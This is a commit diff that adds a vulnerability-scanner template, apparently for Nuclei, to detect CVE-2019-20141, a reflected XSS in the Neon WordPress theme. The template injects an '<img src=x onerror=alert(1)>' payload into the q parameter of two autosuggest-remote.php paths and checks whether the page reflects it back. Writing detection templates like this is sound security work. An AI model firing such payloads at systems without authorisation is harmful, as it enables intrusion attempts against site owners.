Merge pull request #562 from knassar702/new-branch

Neon Dashboard - XSS Reflected (CVE-2019-20141)
2020-10-15 00:17:02 +05:30 · 2020-10-15 00:17:02 +05:30 · dddb8e8a37
parent 431a56847b f4ba565b50
commit dddb8e8a37
1 changed files with 20 additions and 0 deletions
--- a/cves/CVE-2019-20141.yaml
+++ b/cves/CVE-2019-20141.yaml
@ -0,0 +1,20 @@
+id: cve-2019-20141
+
+info:
+  name: Neon Dashboard - XSS Reflected
+  author: knassar702
+  severity: medium
+  description: |
+    An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
+    Source/References:
+    - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/data/autosuggest-remote.php?q=<img%20src=x%20onerror=alert(1)>"
+      - "{{BaseURL}}/admin/data/autosuggest-remote.php?q=<img%20src=x%20onerror=alert(1)>"
+    matchers:
+      - type: word
+        words:
+          - "<img src=x onerror=alert(1)>"
+        part: body